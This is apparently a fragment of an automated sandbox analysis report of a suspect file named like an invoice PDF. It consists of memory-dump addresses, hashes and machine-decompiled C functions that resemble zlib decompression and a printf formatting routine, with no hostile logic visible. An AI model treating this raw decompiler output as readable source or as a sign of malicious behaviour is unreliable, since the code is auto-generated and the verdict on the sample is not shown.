                            0x013158c5
                            0x013158ee
                            0x013158ee
                            0x013158f0
                            0x013158f3
                            0x013158f6
                            0x013158fe
                            0x01315901
                            0x01315903
                            0x01315906
                            0x0131590a
                            0x0131590d
                            0x0131590f
                            0x01315912
                            0x01315915
                            0x01315918
                            0x0131591c
                            0x01315923
                            0x01315926
                            0x01315a1f
                            0x01315a1f
                            0x01315a26
                            0x00000000
                            0x0131592c
                            0x0131592c
                            0x01315930
                            0x00000000
                            0x01315936
                            0x01315936
                            0x0131593d
                            0x00000000
                            0x0131593d
                            0x01315930
                            0x013158c7
                            0x013158c7
                            0x013158c7
                            0x013158c9
                            0x00000000
                            0x00000000
                            0x013158cf
                            0x013158d2
                            0x013158d4
                            0x013158d6
                            0x013158d7
                            0x013158d9
                            0x013158dd
                            0x013158e0
                            0x013158e4
                            0x013158e5
                            0x013158e8
                            0x00000000
                            0x013158ea
                            0x013158ea
                            0x00000000
                            0x013158ea
                            0x00000000
                            0x013158e8
                            0x00000000
                            0x013158c7
                            0x00000000
                            0x00000000
                            0x01315944
                            0x01315944
                            0x01315947
                            0x0131594a
                            0x013159a2
                            0x013159a2
                            0x013159a6
                            0x013159b0
                            0x013159b3
                            0x013159b5
                            0x013159bd
                            0x013159c2
                            0x013159c5
                            0x013159c5
                            0x013159cb
                            0x013159d1
                            0x013159d8
                            0x013159db
                            0x013159de
                            0x013159e0
                            0x013159ee
                            0x013159f4
                            0x013159fc
                            0x01315a00
                            0x01315a02
                            0x01315a32
                            0x01315a39
                            0x00000000
                            0x01315a04
                            0x01315a04
                            0x01315a08
                            0x01315a0c
                            0x01315a13
                            0x00000000
                            0x01315a13
                            0x01315950
                            0x01315950
                            0x01315950
                            0x01315953
                            0x00000000
                            0x01315955
                            0x01315955
                            0x01315955
                            0x01315957
                            0x00000000
                            0x00000000
                            0x0131595d
                            0x01315960
                            0x01315962
                            0x01315964
                            0x01315965
                            0x01315967
                            0x0131596b
                            0x0131596e
                            0x01315972
                            0x01315973
                            0x01315976
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315976
                            0x00000000
                            0x01315955
                            0x00000000
                            0x01315978
                            0x01315978
                            0x0131597d
                            0x01315980
                            0x01315983
                            0x01315986
                            0x0131598a
                            0x01315992
                            0x01315997
                            0x0131599a
                            0x0131599d
                            0x0131599d
                            0x00000000
                            0x01315950
                            0x00000000
                            0x00000000
                            0x01315a40
                            0x01315a43
                            0x01315a46
                            0x01315a49
                            0x01315c83
                            0x01315c83
                            0x01315c8a
                            0x01315893
                            0x01315893
                            0x00000000
                            0x01315c90
                            0x01315c90
                            0x01315c98
                            0x01315ccc
                            0x01315cd2
                            0x01315cd9
                            0x01315cdc
                            0x01315cdf
                            0x01315ce1
                            0x01315cf0
                            0x01315cf6
                            0x01315cfe
                            0x01315d02
                            0x01315d04
                            0x01315d21
                            0x01315d24
                            0x013162e7
                            0x013162e7
                            0x013162e9
                            0x00000000
                            0x00000000
                            0x013162ef
                            0x013162f2
                            0x013162f4
                            0x013162f6
                            0x013162f7
                            0x013162f9
                            0x013162fd
                            0x01316300
                            0x01316304
                            0x01316305
                            0x01316308
                            0x00000000
                            0x0131630a
                            0x0131630a
                            0x00000000
                            0x0131630a
                            0x00000000
                            0x01316308
                            0x00000000
                            0x013162e7
                            0x013162e5
                            0x00000000
                            0x00000000
                            0x013163be
                            0x013163be
                            0x013163c2
                            0x0131643d
                            0x0131643d
                            0x00000000
                            0x013163c4
                            0x013163c4
                            0x013163c8
                            0x00000000
                            0x013163ca
                            0x013163ca
                            0x013163cd
                            0x013163f3
                            0x013163f3
                            0x013163f6
                            0x01316435
                            0x01316437
                            0x01316437
                            0x01316439
                            0x00000000
                            0x013163f8
                            0x013163f8
                            0x013163fc
                            0x01316403
                            0x00000000
                            0x01316403
                            0x013163d0
                            0x013163d0
                            0x013163d0
                            0x013163d2
                            0x00000000
                            0x00000000
                            0x013163d8
                            0x013163db
                            0x013163dd
                            0x013163df
                            0x013163e0
                            0x013163e2
                            0x013163e6
                            0x013163e9
                            0x013163ed
                            0x013163ee
                            0x013163f1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013163f1
                            0x00000000
                            0x013163d0
                            0x013163cd
                            0x013163c8
                            0x00000000
                            0x00000000
                            0x01316444
                            0x01316444
                            0x00000000
                            0x00000000
                            0x01316451
                            0x0131543d
                            0x0131543d
                            0x01315441
                            0x01315441
                            0x01315445
                            0x01315445
                            0x0131544d
                            0x01315451
                            0x01315458
                            0x0131545f
                            0x01315462
                            0x01315466
                            0x01315468
                            0x0131546c
                            0x0131546f
                            0x01315472
                            0x0131549b
                            0x013154a5
                            0x013154aa
                            0x013154ad
                            0x013154af
                            0x01316479
                            0x00000000
                            0x013154b5
                            0x013154b5
                            0x00000000
                            0x013154b5
                            0x01315474
                            0x01315474
                            0x01315477
                            0x0131647d
                            0x01316481
                            0x01316484
                            0x01316487
                            0x0131648a
                            0x0131648d
                            0x01316490
                            0x01316494
                            0x01316498
                            0x013164d6
                            0x013164d6
                            0x0131649a
                            0x0131649a
                            0x0131649c
                            0x00000000
                            0x0131649e
                            0x013164a1
                            0x013164a4
                            0x013164a8
                            0x013164a9
                            0x013164ac
                            0x013164c2
                            0x013164c7
                            0x013164cb
                            0x013164ce
                            0x013164d1
                            0x013164ae
                            0x013164ae
                            0x013164b3
                            0x013164b7
                            0x013164ba
                            0x013164bd
                            0x013164bd
                            0x013164ac
                            0x0131649c
                            0x013164da
                            0x013164dd
                            0x013164e3
                            0x013164f1
                            0x013164f1
                            0x013164e5
                            0x013164e5
                            0x013164eb
                            0x00000000
                            0x013164ed
                            0x013164ed
                            0x013164ed
                            0x013164eb
                            0x013164fb
                            0x01316503
                            0x0131650a
                            0x01316510
                            0x01316517
                            0x01316519
                            0x0131651c
                            0x01316521
                            0x01316524
                            0x0131652a
                            0x0131652a
                            0x0131652f
                            0x01316552
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01316526
                            0x01316526
                            0x01316528
                            0x01316531
                            0x01316531
                            0x0131653c
                            0x0131653f
                            0x0131653f
                            0x01316546
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01316528
                            0x0131547d
                            0x0131547d
                            0x01315480
                            0x01315485
                            0x00000000
                            0x0131548b
                            0x0131548b
                            0x01315490
                            0x00000000
                            0x01315492
                            0x01315492
                            0x01315495
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315495
                            0x01315490
                            0x01315485
                            0x01315477
                            0x00000000
                            0x00000000
                            0x013154bc
                            0x013154c8
                            0x00000000
                            0x00000000
                            0x0131589b
                            0x0131589e
                            0x013158a3
                            0x00000000
                            0x01314f30
                            0x01314f18
                            0x01314ea3
                            0x01314e8d
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93b188c958fcbe0a098e5c2411b6fa7eb5cfcd7fdd27c197b56135e9b3efa640
                            • Instruction ID: 80a56e7253b75c408cd1457966e6dedf6a1bc2b067061b5ffc6caa0a8c569f81
                            • Opcode Fuzzy Hash: 93b188c958fcbe0a098e5c2411b6fa7eb5cfcd7fdd27c197b56135e9b3efa640
                            • Instruction Fuzzy Hash: E842CDB0A047029FE718CF1CC58472ABBE1FFC5308F44862DE9588B69AD375E55ACB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01317440() {
                            				signed char* _t144;
                            				signed int _t161;
                            				signed char* _t170;
                            				signed int _t182;
                            				void* _t184;
                            				signed int _t185;
                            				signed char _t190;
                            				signed int _t197;
                            				signed int _t198;
                            				signed char _t200;
                            				signed int _t201;
                            				signed int _t202;
                            				signed char* _t203;
                            				signed char* _t208;
                            				signed int _t225;
                            				signed char* _t236;
                            				unsigned int _t237;
                            				signed char* _t239;
                            				unsigned int _t241;
                            				signed char** _t243;
                            				signed char _t250;
                            				signed char** _t252;
                            				signed char _t256;
                            				signed char _t257;
                            				signed char* _t259;
                            				void* _t261;
                            				void* _t263;
                            				signed char _t264;
                            				signed char _t266;
                            				signed char _t271;
                            				signed char _t274;
                            				signed char _t279;
                            				signed char* _t280;
                            				signed int _t281;
                            				signed char* _t282;
                            				signed char _t284;
                            				signed char _t285;
                            				signed char _t286;
                            				signed char _t287;
                            				signed char _t288;
                            				void* _t291;
                            				signed char _t294;
                            				signed char* _t295;
                            				unsigned int _t297;
                            				void* _t301;
                            				signed char* _t302;
                            				void* _t304;
                            				signed int* _t306;
                            				signed int _t307;
                            				signed int _t308;
                            				void* _t309;
                            
                            				_t243 =  *(_t309 + 0x4c);
                            				_t236 = _t243[7];
                            				_t280 =  *_t243;
                            				_t306 = _t243[3];
                            				 *(_t309 + 0x38) =  &(( &(_t243[1][0xfffffffffffffffb]))[_t280]);
                            				_t144 = _t243[4];
                            				_t307 = _t236[0x40];
                            				 *(_t309 + 0x14) =  &(( &(_t144[0xfffffffffffffeff]))[_t306]);
                            				 *(_t309 + 0x30) = _t236[0x2c];
                            				 *(_t309 + 0x44) = _t236[0x30];
                            				 *(_t309 + 0x34) = _t236[0x34];
                            				 *(_t309 + 0x20) = _t236[0x38];
                            				 *(_t309 + 0x28) = _t236[0x50];
                            				 *(_t309 + 0x2c) = _t236[0x54];
                            				 *(_t309 + 0x18) = 1;
                            				 *((intOrPtr*)(_t309 + 0x40)) = _t144 -  *(_t309 + 0x50) + _t306;
                            				 *(_t309 + 0x18) =  *(_t309 + 0x18) << _t236[0x58];
                            				 *(_t309 + 0x18) =  *(_t309 + 0x18) - 1;
                            				 *(_t309 + 0x1c) = _t236;
                            				_t297 = _t236[0x3c];
                            				 *(_t309 + 0x10) = _t280;
                            				 *(_t309 + 0x3c) = (1 << _t236[0x5c]) - 1;
                            				do {
                            					if(_t307 < 0xf) {
                            						_t297 = _t297 + (( *_t280 & 0x000000ff) << _t307) + ((_t280[1] & 0x000000ff) << _t307 + 8);
                            						 *(_t309 + 0x10) =  &(_t280[2]);
                            						_t307 = _t307 + 0x10;
                            					}
                            					_t237 =  *( *(_t309 + 0x28) + ( *(_t309 + 0x18) & _t297) * 4);
                            					_t250 = _t237 >> 0x00000008 & 0x000000ff;
                            					_t297 = _t297 >> _t250;
                            					_t307 = _t307 - _t250;
                            					_t281 = _t237 & 0x000000ff;
                            					if(_t237 == 0) {
                            						L7:
                            						 *_t306 = _t237 >> 0x10;
                            						_t306 =  &(_t306[0]);
                            						L47:
                            						_t280 =  *(_t309 + 0x10);
                            						_t239 =  *(_t309 + 0x14);
                            						if(_t280 >=  *(_t309 + 0x38)) {
                            							L62:
                            							_t161 = _t307 >> 3;
                            							_t282 = _t280 - _t161;
                            							_t308 = _t307 - (_t161 << 3);
                            							_t252 =  *(_t309 + 0x4c);
                            							_t252[1] =  *(_t309 + 0x38) - _t282 + 5;
                            							_t252[3] = _t306;
                            							 *_t252 = _t282;
                            							_t252[4] = _t239 - _t306 + 0x101;
                            							_t170 =  *(_t309 + 0x1c);
                            							_t170[0x3c] = _t297 & (0x00000001 << _t308) - 0x00000001;
                            							_t170[0x40] = _t308;
                            							return _t170;
                            						}
                            						goto L48;
                            					}
                            					while((_t281 & 0x00000010) == 0) {
                            						if((_t281 & 0x00000040) != 0) {
                            							_t203 =  *(_t309 + 0x1c);
                            							_t239 =  *(_t309 + 0x14);
                            							_t280 =  *(_t309 + 0x10);
                            							if((_t281 & 0x00000020) == 0) {
                            								( *(_t309 + 0x4c))[6] = "invalid literal/length code";
                            								L61:
                            								_t203[4] = 0x3f51;
                            								goto L62;
                            							}
                            							_t203[4] = 0x3f3f;
                            							goto L62;
                            						}
                            						_t237 =  *( *(_t309 + 0x28) + (((0x00000001 << _t281) - 0x00000001 & _t297) + (_t237 >> 0x10)) * 4);
                            						_t279 = _t237 >> 0x00000008 & 0x000000ff;
                            						_t297 = _t297 >> _t279;
                            						_t307 = _t307 - _t279;
                            						_t281 = _t237 & 0x000000ff;
                            						if(_t237 != 0) {
                            							continue;
                            						}
                            						goto L7;
                            					}
                            					_t241 = _t237 >> 0x10;
                            					_t284 = _t281 & 0x0000000f;
                            					if(_t284 != 0) {
                            						_t274 = _t284;
                            						_t225 = (0x00000001 << _t274) - 0x00000001 & _t297;
                            						_t297 = _t297 >> _t274;
                            						_t241 = _t241 + _t225;
                            						_t307 = _t307 - _t284;
                            					}
                            					if(_t307 < 0xf) {
                            						_t295 =  *(_t309 + 0x10);
                            						_t297 = _t297 + (( *_t295 & 0x000000ff) << _t307) + ((_t295[1] & 0x000000ff) << _t307 + 8);
                            						 *(_t309 + 0x10) =  &(_t295[2]);
                            						_t307 = _t307 + 0x10;
                            					}
                            					_t285 =  *( *(_t309 + 0x2c) + ( *(_t309 + 0x3c) & _t297) * 4);
                            					_t256 = _t285 >> 0x00000008 & 0x000000ff;
                            					 *(_t309 + 0x50) = _t285;
                            					_t307 = _t307 - _t256;
                            					_t286 = _t285 & 0x000000ff;
                            					_t297 = _t297 >> _t256;
                            					if((_t286 & 0x00000010) != 0) {
                            						L17:
                            						 *(_t309 + 0x50) =  *(_t309 + 0x50) >> 0x10;
                            						_t287 = _t286 & 0x0000000f;
                            						if(_t307 < _t287) {
                            							_t266 = _t307;
                            							_t307 = _t307 + 8;
                            							_t297 = _t297 + (( *( *(_t309 + 0x10)) & 0x000000ff) << _t266);
                            							_t208 =  &(( *(_t309 + 0x10))[1]);
                            							 *(_t309 + 0x10) = _t208;
                            							if(_t307 < _t287) {
                            								 *(_t309 + 0x10) =  &(( *(_t309 + 0x10))[1]);
                            								_t297 = _t297 + (( *_t208 & 0x000000ff) << _t307);
                            								_t307 = _t307 + 8;
                            							}
                            						}
                            						_t257 = _t287;
                            						_t307 = _t307 - _t287;
                            						_t182 = (0x00000001 << _t257) - 0x00000001 & _t297;
                            						_t297 = _t297 >> _t257;
                            						 *(_t309 + 0x50) =  *(_t309 + 0x50) + _t182;
                            						_t184 = _t306 -  *((intOrPtr*)(_t309 + 0x40));
                            						_t288 =  *(_t309 + 0x50);
                            						 *(_t309 + 0x24) = _t297;
                            						if(_t288 <= _t184) {
                            							_t259 = _t306 - _t288;
                            							do {
                            								_t185 =  *_t259 & 0x000000ff;
                            								_t259 =  &(_t259[3]);
                            								 *_t306 = _t185;
                            								_t241 = _t241 - 3;
                            								_t306[0] =  *(_t259 - 2) & 0x000000ff;
                            								_t306[0] =  *(_t259 - 1) & 0x000000ff;
                            								_t306 =  &(_t306[0]);
                            							} while (_t241 > 2);
                            							if(_t241 != 0) {
                            								 *_t306 =  *_t259;
                            								_t306 =  &(_t306[0]);
                            								if(_t241 > 1) {
                            									 *_t306 = _t259[1];
                            									_t306 =  &(_t306[0]);
                            								}
                            							}
                            							goto L47;
                            						} else {
                            							_t261 = _t288 - _t184;
                            							if(_t261 <=  *(_t309 + 0x44)) {
                            								L23:
                            								_t190 =  *(_t309 + 0x34);
                            								_t301 =  *(_t309 + 0x20) - _t261;
                            								if(_t190 != 0) {
                            									_t302 = _t301 + _t190;
                            									if(_t190 >= _t261) {
                            										if(_t261 >= _t241) {
                            											L40:
                            											if(_t241 <= 2) {
                            												L43:
                            												if(_t241 != 0) {
                            													 *_t306 =  *_t302;
                            													_t306 =  &(_t306[0]);
                            													if(_t241 > 1) {
                            														 *_t306 = _t302[1];
                            														_t306 =  &(_t306[0]);
                            													}
                            												}
                            												_t297 =  *(_t309 + 0x24);
                            												goto L47;
                            											}
                            											_t291 = (0xaaaaaaab * (_t241 - 3) >> 0x20 >> 1) + 1;
                            											do {
                            												_t241 = _t241 - 3;
                            												 *_t306 =  *_t302 & 0x000000ff;
                            												_t306[0] = _t302[1] & 0x000000ff;
                            												_t197 = _t302[2] & 0x000000ff;
                            												_t302 =  &(_t302[3]);
                            												_t306[0] = _t197;
                            												_t306 =  &(_t306[0]);
                            												_t291 = _t291 - 1;
                            											} while (_t291 != 0);
                            											goto L43;
                            										}
                            										_t241 = _t241 - _t261;
                            										do {
                            											_t198 =  *_t302;
                            											_t302 =  &(_t302[1]);
                            											 *_t306 = _t198;
                            											_t306 =  &(_t306[0]);
                            											_t261 = _t261 - 1;
                            										} while (_t261 != 0);
                            										L39:
                            										_t302 = _t306 - _t288;
                            										goto L40;
                            									}
                            									_t302 =  &(_t302[ *(_t309 + 0x30)]);
                            									_t263 = _t261 - _t190;
                            									if(_t263 >= _t241) {
                            										goto L40;
                            									}
                            									_t241 = _t241 - _t263;
                            									_t304 = _t302 - _t306;
                            									do {
                            										 *_t306 =  *((intOrPtr*)(_t304 + _t306));
                            										_t306 =  &(_t306[0]);
                            										_t263 = _t263 - 1;
                            									} while (_t263 != 0);
                            									_t200 =  *(_t309 + 0x34);
                            									_t302 =  *(_t309 + 0x20);
                            									if(_t200 >= _t241) {
                            										goto L40;
                            									}
                            									_t264 = _t200;
                            									_t241 = _t241 - _t200;
                            									do {
                            										_t201 =  *_t302;
                            										_t302 =  &(_t302[1]);
                            										 *_t306 = _t201;
                            										_t306 =  &(_t306[0]);
                            										_t264 = _t264 - 1;
                            									} while (_t264 != 0);
                            									goto L39;
                            								}
                            								_t302 = _t301 +  *(_t309 + 0x30);
                            								if(_t261 >= _t241) {
                            									goto L40;
                            								}
                            								_t241 = _t241 - _t261;
                            								do {
                            									_t202 =  *_t302;
                            									_t302 =  &(_t302[1]);
                            									 *_t306 = _t202;
                            									_t306 =  &(_t306[0]);
                            									_t261 = _t261 - 1;
                            								} while (_t261 != 0);
                            								goto L39;
                            							}
                            							_t203 =  *(_t309 + 0x1c);
                            							if(_t203[0x1bc4] != 0) {
                            								( *(_t309 + 0x4c))[6] = "invalid distance too far back";
                            								goto L60;
                            							}
                            							goto L23;
                            						}
                            					} else {
                            						while((_t286 & 0x00000040) == 0) {
                            							_t294 =  *( *(_t309 + 0x2c) + (((0x00000001 << _t286) - 0x00000001 & _t297) + ( *(_t309 + 0x50) >> 0x10)) * 4);
                            							_t271 = _t294 >> 0x00000008 & 0x000000ff;
                            							 *(_t309 + 0x50) = _t294;
                            							_t307 = _t307 - _t271;
                            							_t286 = _t294 & 0x000000ff;
                            							_t297 = _t297 >> _t271;
                            							if((_t286 & 0x00000010) == 0) {
                            								continue;
                            							}
                            							goto L17;
                            						}
                            						_t203 =  *(_t309 + 0x1c);
                            						( *(_t309 + 0x4c))[6] = "invalid distance code";
                            						L60:
                            						_t239 =  *(_t309 + 0x14);
                            						_t280 =  *(_t309 + 0x10);
                            						goto L61;
                            					}
                            					L48:
                            				} while (_t306 < _t239);
                            				goto L62;
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • Opcode ID: 9609dceef1e7e42849d35d45851ee18cc186e9c2db41e0cc93d51b924dafef7b
                            • Instruction ID: d3c3fdebb65d6e87ff62cbb280b362306f37c7bae4e23dc00719a142d7bcd9ae
                            • Opcode Fuzzy Hash: 9609dceef1e7e42849d35d45851ee18cc186e9c2db41e0cc93d51b924dafef7b
                            • Instruction Fuzzy Hash: 49D1BF356083928FC709CE2CC490529BBE2EFC9208F1C4A6DE8E58B74AD775D54ACB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E0131BB41(void* __ecx) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t52;
                            				signed int _t54;
                            				signed int _t55;
                            				void* _t56;
                            				signed int _t57;
                            				signed char _t59;
                            				signed char _t61;
                            				signed int _t63;
                            				void* _t64;
                            				signed int _t65;
                            				signed char _t74;
                            				signed char _t77;
                            				void* _t85;
                            				void* _t87;
                            				signed char _t89;
                            				signed char _t91;
                            				signed int _t92;
                            				signed int _t94;
                            				signed int _t96;
                            				signed int _t97;
                            				signed int _t101;
                            				signed int* _t103;
                            				void* _t105;
                            				signed int _t111;
                            				unsigned int _t113;
                            				signed char _t115;
                            				void* _t123;
                            				unsigned int _t124;
                            				void* _t125;
                            				signed int _t126;
                            				short _t127;
                            				void* _t130;
                            				void* _t132;
                            				void* _t134;
                            				signed int _t136;
                            				void* _t137;
                            				void* _t139;
                            				void* _t140;
                            
                            				_t52 =  *0x133c008; // 0xa3433343
                            				_v8 = _t52 ^ _t136;
                            				_t134 = __ecx;
                            				_t101 = 0;
                            				_t123 = 0x41;
                            				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                            				_t105 = 0x58;
                            				_t139 = _t54 - 0x64;
                            				if(_t139 > 0) {
                            					__eflags = _t54 - 0x70;
                            					if(__eflags > 0) {
                            						_t55 = _t54 - 0x73;
                            						__eflags = _t55;
                            						if(_t55 == 0) {
                            							L9:
                            							_t56 = E0131C573(_t134);
                            							L10:
                            							if(_t56 != 0) {
                            								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t101;
                            								if( *((intOrPtr*)(_t134 + 0x30)) != _t101) {
                            									L71:
                            									_t57 = 1;
                            									L72:
                            									E0131786A();
                            									return _t57;
                            								}
                            								_t124 =  *(_t134 + 0x20);
                            								_push(_t125);
                            								_v16 = _t101;
                            								_t59 = _t124 >> 4;
                            								_v12 = _t101;
                            								_t126 = 0x20;
                            								__eflags = 1 & _t59;
                            								if((1 & _t59) == 0) {
                            									L46:
                            									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
                            									__eflags = _t111 - 0x78;
                            									if(_t111 == 0x78) {
                            										L48:
                            										_t61 = _t124 >> 5;
                            										__eflags = _t61 & 0x00000001;
                            										if((_t61 & 0x00000001) == 0) {
                            											L50:
                            											__eflags = 0;
                            											L51:
                            											__eflags = _t111 - 0x61;
                            											if(_t111 == 0x61) {
                            												L54:
                            												_t63 = 1;
                            												L55:
                            												_t127 = 0x30;
                            												__eflags = _t63;
                            												if(_t63 != 0) {
                            													L57:
                            													_t64 = 0x58;
                            													 *((short*)(_t136 + _t101 * 2 - 0xc)) = _t127;
                            													__eflags = _t111 - _t64;
                            													if(_t111 == _t64) {
                            														L60:
                            														_t65 = 1;
                            														L61:
                            														__eflags = _t65;
                            														asm("cbw");
                            														 *((short*)(_t136 + _t101 * 2 - 0xa)) = ((_t65 & 0xffffff00 | _t65 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                            														_t101 = _t101 + 2;
                            														__eflags = _t101;
                            														L62:
                            														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t101;
                            														__eflags = _t124 & 0x0000000c;
                            														if((_t124 & 0x0000000c) == 0) {
                            															E0131AE08(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
                            															_t137 = _t137 + 0x10;
                            														}
                            														E0131C873(_t134 + 0x448,  &_v16, _t101, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
                            														_t113 =  *(_t134 + 0x20);
                            														_t103 = _t134 + 0x18;
                            														_t74 = _t113 >> 3;
                            														__eflags = _t74 & 0x00000001;
                            														if((_t74 & 0x00000001) != 0) {
                            															_t115 = _t113 >> 2;
                            															__eflags = _t115 & 0x00000001;
                            															if((_t115 & 0x00000001) == 0) {
                            																E0131AE08(_t134 + 0x448, 0x30, _t130, _t103);
                            																_t137 = _t137 + 0x10;
                            															}
                            														}
                            														E0131C755(_t134, 0);
                            														__eflags =  *_t103;
                            														if( *_t103 >= 0) {
                            															_t77 =  *(_t134 + 0x20) >> 2;
                            															__eflags = _t77 & 0x00000001;
                            															if((_t77 & 0x00000001) != 0) {
                            																E0131AE08(_t134 + 0x448, 0x20, _t130, _t103);
                            															}
                            														}
                            														goto L71;
                            													}
                            													_t85 = 0x41;
                            													__eflags = _t111 - _t85;
                            													if(_t111 == _t85) {
                            														goto L60;
                            													}
                            													_t65 = 0;
                            													goto L61;
                            												}
                            												__eflags = _t63;
                            												if(_t63 == 0) {
                            													goto L62;
                            												}
                            												goto L57;
                            											}
                            											_t132 = 0x41;
                            											__eflags = _t111 - _t132;
                            											if(_t111 == _t132) {
                            												goto L54;
                            											}
                            											_t63 = 0;
                            											goto L55;
                            										}
                            										goto L51;
                            									}
                            									_t87 = 0x58;
                            									__eflags = _t111 - _t87;
                            									if(_t111 != _t87) {
                            										goto L50;
                            									}
                            									goto L48;
                            								}
                            								_t89 = _t124 >> 6;
                            								__eflags = 1 & _t89;
                            								if((1 & _t89) == 0) {
                            									__eflags = 1 & _t124;
                            									if((1 & _t124) == 0) {
                            										_t91 = _t124 >> 1;
                            										__eflags = 1 & _t91;
                            										if((1 & _t91) == 0) {
                            											goto L46;
                            										}
                            										_v16 = _t126;
                            										L45:
                            										_t101 = 1;
                            										goto L46;
                            									}
                            									_push(0x2b);
                            									L40:
                            									_pop(_t92);
                            									_v16 = _t92;
                            									goto L45;
                            								}
                            								_push(0x2d);
                            								goto L40;
                            							}
                            							L11:
                            							_t57 = 0;
                            							goto L72;
                            						}
                            						_t94 = _t55;
                            						__eflags = _t94;
                            						if(__eflags == 0) {
                            							L28:
                            							_push(_t101);
                            							_push(0xa);
                            							L29:
                            							_t56 = E0131C30B(_t134, _t125, __eflags);
                            							goto L10;
                            						}
                            						__eflags = _t94 - 3;
                            						if(__eflags != 0) {
                            							goto L11;
                            						}
                            						_push(0);
                            						L13:
                            						_push(0x10);
                            						goto L29;
                            					}
                            					if(__eflags == 0) {
                            						_t56 = E0131C4E8(__ecx);
                            						goto L10;
                            					}
                            					__eflags = _t54 - 0x67;
                            					if(_t54 <= 0x67) {
                            						L30:
                            						_t56 = E0131C071(_t101, _t134);
                            						goto L10;
                            					}
                            					__eflags = _t54 - 0x69;
                            					if(_t54 == 0x69) {
                            						L27:
                            						_t3 = _t134 + 0x20;
                            						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
                            						__eflags =  *_t3;
                            						goto L28;
                            					}
                            					__eflags = _t54 - 0x6e;
                            					if(_t54 == 0x6e) {
                            						_t56 = E0131C455(__ecx, _t123);
                            						goto L10;
                            					}
                            					__eflags = _t54 - 0x6f;
                            					if(_t54 != 0x6f) {
                            						goto L11;
                            					}
                            					_t56 = E0131C4C9(__ecx);
                            					goto L10;
                            				}
                            				if(_t139 == 0) {
                            					goto L27;
                            				}
                            				_t140 = _t54 - _t105;
                            				if(_t140 > 0) {
                            					_t96 = _t54 - 0x5a;
                            					__eflags = _t96;
                            					if(_t96 == 0) {
                            						_t56 = E0131BEB4(__ecx);
                            						goto L10;
                            					}
                            					_t97 = _t96 - 7;
                            					__eflags = _t97;
                            					if(_t97 == 0) {
                            						goto L30;
                            					}
                            					__eflags = _t97;
                            					if(__eflags != 0) {
                            						goto L11;
                            					}
                            					L17:
                            					_t56 = E0131C273(_t134, __eflags, _t101);
                            					goto L10;
                            				}
                            				if(_t140 == 0) {
                            					_push(1);
                            					goto L13;
                            				}
                            				if(_t54 == _t123) {
                            					goto L30;
                            				}
                            				if(_t54 == 0x43) {
                            					goto L17;
                            				}
                            				if(_t54 <= 0x44) {
                            					goto L11;
                            				}
                            				if(_t54 <= 0x47) {
                            					goto L30;
                            				}
                            				if(_t54 != 0x53) {
                            					goto L11;
                            				}
                            				goto L9;
                            			}
                            0x0131bbf9
                            0x00000000
                            0x0131bbf9
                            0x0131bbe9
                            0x0131bbec
                            0x00000000
                            0x00000000
                            0x0131bbf0
                            0x00000000
                            0x0131bbf0
                            0x0131bb68
                            0x00000000
                            0x00000000
                            0x0131bb6e
                            0x0131bb70
                            0x0131bbb0
                            0x0131bbb0
                            0x0131bbb3
                            0x0131bbcc
                            0x00000000
                            0x0131bbcc
                            0x0131bbb5
                            0x0131bbb5
                            0x0131bbb8
                            0x00000000
                            0x00000000
                            0x0131bbbb
                            0x0131bbbe
                            0x00000000
                            0x00000000
                            0x0131bbc0
                            0x0131bbc3
                            0x00000000
                            0x0131bbc3
                            0x0131bb72
                            0x0131bbaa
                            0x00000000
                            0x0131bbaa
                            0x0131bb76
                            0x00000000
                            0x00000000
                            0x0131bb7f
                            0x00000000
                            0x00000000
                            0x0131bb84
                            0x00000000
                            0x00000000
                            0x0131bb89
                            0x00000000
                            0x00000000
                            0x0131bb92
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
